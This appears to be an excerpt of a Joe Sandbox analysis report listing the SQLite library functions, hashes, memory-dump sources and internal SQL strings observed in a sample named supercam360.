                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465156292-0
                                                    • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                    • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                    • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                    • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                    APIs
                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465156292-0
                                                    • Opcode ID: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                    • Instruction ID: bc2fa39936d9f4ed0ba1ebf98b65e017ff83ed2bbf5e058a49948814e7f33c49
                                                    • Opcode Fuzzy Hash: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                    • Instruction Fuzzy Hash: 59E0EC74A042089BCB04DF6AD4C194AB7F9EF58258B14D665EC458B309E231E9858BC1
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 3064317574-0
                                                    • Opcode ID: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                    • Instruction ID: 7a9bf9350bb0d435b7485bd9c083abc2dab3a9c90cc7cce47300d03dda88f0d0
                                                    • Opcode Fuzzy Hash: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                    • Instruction Fuzzy Hash: FFD092B4909309AFCB00EF29C48644EBBE5AF98258F40C82DFC98C7314E274E8408F92
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc903d30242b0235a49ca3dc9f8df4f0198bb3c17ee07b08e44db8f45d9d2100
                                                    • Instruction ID: 8dcd3a280e311d85a08cff7bb149483fc74061697cd2af1d422aa8a6e56622f3
                                                    • Opcode Fuzzy Hash: fc903d30242b0235a49ca3dc9f8df4f0198bb3c17ee07b08e44db8f45d9d2100
                                                    • Instruction Fuzzy Hash: 3DE0E2287142159BDB08EE6AC6C181B77ABBFD9654760846CE9078F202E776E9029640
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                    • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                    • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                    • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                    • Instruction ID: a276b763828cd9d21177d39229c24ef0f5c00ef14d0f26540801fec71d9d5410
                                                    • Opcode Fuzzy Hash: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                    • Instruction Fuzzy Hash: 29E0E2B850430DABDF00CF09D8C198A7BAAFB08264F10C119FC190B304C331E9148BE1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                    • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                    • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                    • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83a733227118cb881a49c8c313e73996236a25ff6ef409992dae375156ab2579
                                                    • Instruction ID: b9da89681c28018b616aefc3abdd9d2409dd53a1bfe33812f7039069606fa4db
                                                    • Opcode Fuzzy Hash: 83a733227118cb881a49c8c313e73996236a25ff6ef409992dae375156ab2579
                                                    • Instruction Fuzzy Hash: 6DB09214310A0F829B008B29A4819277BEEAB989897558064990A8A115FA71F88286C0
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                      • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                    • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                    • sqlite3_free.SQLITE3 ref: 6096C67E
                                                    • sqlite3_free.SQLITE3 ref: 6096CD71
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                    • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                    • sqlite3_close.SQLITE3 ref: 6096CD97
                                                    • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                    • API String ID: 1320758876-2501389569
                                                    • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                    • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                    • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                    • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 6096B97B
                                                    • sqlite3_snprintf.SQLITE3 ref: 6096B9AC
                                                      • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                    • sqlite3_free.SQLITE3 ref: 6096B9EF
                                                    • sqlite3_free.SQLITE3 ref: 6096B9F7
                                                    • sqlite3_free.SQLITE3 ref: 6096BB2F
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    • sqlite3_free.SQLITE3 ref: 6096BB4D
                                                    • sqlite3_snprintf.SQLITE3 ref: 6096BB8C
                                                    • sqlite3_randomness.SQLITE3 ref: 6096BBA8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_randomnesssqlite3_vsnprintf
                                                    • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                                    • API String ID: 4138564650-3409217566
                                                    • Opcode ID: d5c86827daa2af85ef8c0105f170410dfd040fbf42e321896459ed7510188ef4
                                                    • Instruction ID: 4695190612d0baa7224baff06fb57533ac243ac8fcb723a729aef1344b38de53
                                                    • Opcode Fuzzy Hash: d5c86827daa2af85ef8c0105f170410dfd040fbf42e321896459ed7510188ef4
                                                    • Instruction Fuzzy Hash: 23814F70A187048BE7109FB9C4813AEBBF7AFB5308F40C86DE4959B245E778C881DB52
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                    • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                    • API String ID: 937752868-2111127023
                                                    • Opcode ID: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                    • Instruction ID: 65a1564e5812e901c47d2d0e8e64920046ae54dd737849fc0956122b524b53c9
                                                    • Opcode Fuzzy Hash: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                    • Instruction Fuzzy Hash: 19512C706187018FE700AF69D88575DBFF6AFA5708F10C81DE8999B214EB78C845DF42
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                    • String ID: @$access$cache
                                                    • API String ID: 4158134138-1361544076
                                                    • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                    • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                    • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                    • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                    APIs
                                                    Strings
                                                    • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                    • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                    • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                    • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                    • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                    • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                    • BEGIN;, xrefs: 609485DB
                                                    • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                    • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                    • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                    • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log
                                                    • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                    • API String ID: 632333372-52344843
                                                    • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                    • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                    • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                    • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                    APIs
                                                      • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                      • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                      • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                      • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                      • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                      • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                      • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                    • sqlite3_malloc.SQLITE3 ref: 60960384
                                                    • sqlite3_free.SQLITE3 ref: 609605EA
                                                    • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                    • sqlite3_free.SQLITE3 ref: 60960618
                                                    • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                    • String ID: offsets
                                                    • API String ID: 463808202-2642679573
                                                    • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                    • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                    • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                    • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                    • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                    • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                    • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                    • String ID:
                                                    • API String ID: 2903785150-0
                                                    • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                    • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                    • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                    • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_malloc
                                                    • String ID:
                                                    • API String ID: 423083942-0
                                                    • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
